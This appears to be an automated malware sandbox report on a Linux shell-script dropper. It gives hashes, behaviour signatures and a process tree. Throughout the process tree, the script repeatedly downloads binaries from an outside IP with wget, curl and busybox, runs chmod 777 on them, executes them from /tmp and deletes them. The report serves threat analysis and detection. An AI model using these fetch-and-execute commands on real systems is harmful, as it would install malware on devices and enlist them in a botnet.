Analysis
-
max time kernel
19s -
max time network
21s -
platform
debian-9_armhf -
resource
debian9-armhf-20240729-en -
resource tags
arch:armhf, image:debian9-armhf-20240729-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system -
submitted
21/10/2024, 02:00
Static task
static1
Behavioral task
behavioral1
Sample
90d47b9bc105b4b807234ad1c7410b2eff5c6fc38096f3ede782edefffdcc09c.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
90d47b9bc105b4b807234ad1c7410b2eff5c6fc38096f3ede782edefffdcc09c.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
90d47b9bc105b4b807234ad1c7410b2eff5c6fc38096f3ede782edefffdcc09c.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
90d47b9bc105b4b807234ad1c7410b2eff5c6fc38096f3ede782edefffdcc09c.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
90d47b9bc105b4b807234ad1c7410b2eff5c6fc38096f3ede782edefffdcc09c.sh
-
Size
10KB
-
MD5
f542050a645c72e971d62a3493d03ae4
-
SHA1
9517efa75044c18478c68a6d42b01b42a2af2329
-
SHA256
90d47b9bc105b4b807234ad1c7410b2eff5c6fc38096f3ede782edefffdcc09c
-
SHA512
2934d0671bff24eb6ed85dc500e0d6b40470feb320ea6561cda2cb0e9aca88122ba2739e65472e29c40a565454c1182288cf4f4feb19d9143e1ecd3daab76a26
-
SSDEEP
96:VVRM3rrZCbd1HK0VBiVtx2VNzk4atFzbUeVRM3rrlXkbd1/f3s1O5VBiVtn:0Cbd1q0VBiVtx2VNGjd1jVBiVtn
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 16 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 16 IoCs
Checks CPU configuration 1 TTPs 16 IoCs
Checks CPU information, which indicates if the system is a virtual machine.
Writes file to tmp directory 16 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/90d47b9bc105b4b807234ad1c7410b2eff5c6fc38096f3ede782edefffdcc09c.sh/tmp/90d47b9bc105b4b807234ad1c7410b2eff5c6fc38096f3ede782edefffdcc09c.sh1⤵PID:655
-
/bin/rm/bin/rm bins.sh2⤵PID:658
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe2⤵PID:663
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:678
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe2⤵PID:685
-
-
/bin/chmodchmod 777 TPNzXwjn6apQfkRcknYePIax5Lysis1bOe2⤵
- File and Directory Permissions Modification
PID:688
-
-
/tmp/TPNzXwjn6apQfkRcknYePIax5Lysis1bOe./TPNzXwjn6apQfkRcknYePIax5Lysis1bOe2⤵
- Executes dropped EXE
PID:689
-
-
/bin/rmrm TPNzXwjn6apQfkRcknYePIax5Lysis1bOe2⤵PID:691
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX52⤵PID:692
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX52⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:693
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX52⤵PID:694
-
-
/bin/chmodchmod 777 1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX52⤵
- File and Directory Permissions Modification
PID:695
-
-
/tmp/1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX5./1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX52⤵
- Executes dropped EXE
PID:696
-
-
/bin/rmrm 1u4vp4bLhDBT4JoSOunQiGcHwQavNZ8QX52⤵PID:697
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP2⤵PID:698
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:703
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP2⤵PID:709
-
-
/bin/chmodchmod 777 IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP2⤵
- File and Directory Permissions Modification
PID:713
-
-
/tmp/IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP./IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP2⤵
- Executes dropped EXE
PID:714
-
-
/bin/rmrm IeYBlXxWvG24Zs04oiIuD2E3lf5s5uXMeP2⤵PID:715
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX2⤵PID:717
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:721
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX2⤵PID:726
-
-
/bin/chmodchmod 777 S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX2⤵
- File and Directory Permissions Modification
PID:731
-
-
/tmp/S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX./S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX2⤵
- Executes dropped EXE
PID:732
-
-
/bin/rmrm S9nriaikz6NnzmYfAaZIhUZhlW0s7pfzWX2⤵PID:733
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe2⤵PID:734
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:740
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe2⤵PID:749
-
-
/bin/chmodchmod 777 Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe2⤵
- File and Directory Permissions Modification
PID:753
-
-
/tmp/Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe./Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe2⤵
- Executes dropped EXE
PID:755
-
-
/bin/rmrm Zia4GAuU7X9Cg2uWd4pSODNyOV72eibRJe2⤵PID:756
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf2⤵PID:757
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:762
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf2⤵PID:763
-
-
/bin/chmodchmod 777 uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf2⤵
- File and Directory Permissions Modification
PID:764
-
-
/tmp/uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf./uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf2⤵
- Executes dropped EXE
PID:765
-
-
/bin/rmrm uQmrtjXDUJc5Pg68moJrRSIrQyJqVgLJvf2⤵PID:766
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq02⤵PID:767
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq02⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:768
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq02⤵PID:774
-
-
/bin/chmodchmod 777 miY7w8K2riU0k6hDXSam7xtKULsCrCSlq02⤵
- File and Directory Permissions Modification
PID:778
-
-
/tmp/miY7w8K2riU0k6hDXSam7xtKULsCrCSlq0./miY7w8K2riU0k6hDXSam7xtKULsCrCSlq02⤵
- Executes dropped EXE
PID:780
-
-
/bin/rmrm miY7w8K2riU0k6hDXSam7xtKULsCrCSlq02⤵PID:781
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE2⤵PID:783
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:788
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE2⤵PID:793
-
-
/bin/chmodchmod 777 59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE2⤵
- File and Directory Permissions Modification
PID:796
-
-
/tmp/59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE./59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE2⤵
- Executes dropped EXE
PID:798
-
-
/bin/rmrm 59BQuliR3hYHfWAgfpt8T7OFv602oWzyOE2⤵PID:799
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq2⤵PID:801
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:806
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq2⤵PID:811
-
-
/bin/chmodchmod 777 afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq2⤵
- File and Directory Permissions Modification
PID:812
-
-
/tmp/afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq./afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq2⤵
- Executes dropped EXE
PID:813
-
-
/bin/rmrm afPXveUbPfxAuHZmifmYTujYOZXBLlQZFq2⤵PID:814
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC2⤵PID:815
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:816
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC2⤵PID:817
-
-
/bin/chmodchmod 777 Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC2⤵
- File and Directory Permissions Modification
PID:818
-
-
/tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC./Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC2⤵
- Executes dropped EXE
PID:819
-
-
/bin/rmrm Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC2⤵PID:820
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH2⤵PID:821
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:822
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH2⤵PID:823
-
-
/bin/chmodchmod 777 Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH2⤵
- File and Directory Permissions Modification
PID:824
-
-
/tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH./Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH2⤵
- Executes dropped EXE
PID:825
-
-
/bin/rmrm Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH2⤵PID:826
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l2⤵PID:827
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:828
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l2⤵PID:829
-
-
/bin/chmodchmod 777 fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l2⤵
- File and Directory Permissions Modification
PID:830
-
-
/tmp/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l./fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l2⤵
- Executes dropped EXE
PID:831
-
-
/bin/rmrm fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l2⤵PID:832
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP12⤵PID:833
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP12⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:835
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP12⤵PID:837
-
-
/bin/chmodchmod 777 I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP12⤵
- File and Directory Permissions Modification
PID:838
-
-
/tmp/I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP1./I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP12⤵
- Executes dropped EXE
PID:839
-
-
/bin/rmrm I5Z8JP4u1SIZc1ABgHbuhys8GDbxnA3NP12⤵PID:840
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP2⤵PID:841
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:842
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP2⤵PID:843
-
-
/bin/chmodchmod 777 he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP2⤵
- File and Directory Permissions Modification
PID:844
-
-
/tmp/he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP./he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP2⤵
- Executes dropped EXE
PID:845
-
-
/bin/rmrm he5RSQr78VIGx4rXLkRXL56XgsKtYut6zP2⤵PID:846
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC2⤵PID:847
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:848
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC2⤵PID:849
-
-
/bin/chmodchmod 777 Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC2⤵
- File and Directory Permissions Modification
PID:850
-
-
/tmp/Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC./Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC2⤵
- Executes dropped EXE
PID:851
-
-
/bin/rmrm Ech8T69jAKnFOouqjZAiZboroKTMkJ4DFC2⤵PID:852
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH2⤵PID:853
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:854
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH2⤵PID:855
-
-
/bin/chmodchmod 777 Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH2⤵
- File and Directory Permissions Modification
PID:856
-
-
/tmp/Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH./Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH2⤵
- Executes dropped EXE
PID:857
-
-
/bin/rmrm Nu1YFYkC7vQ3HD5k7uc7QJ4BzluGUMhULH2⤵PID:858
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/fXHDWbE2jHwpVJUVxKCHdEUyrMJyz5u15l2⤵PID:859
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97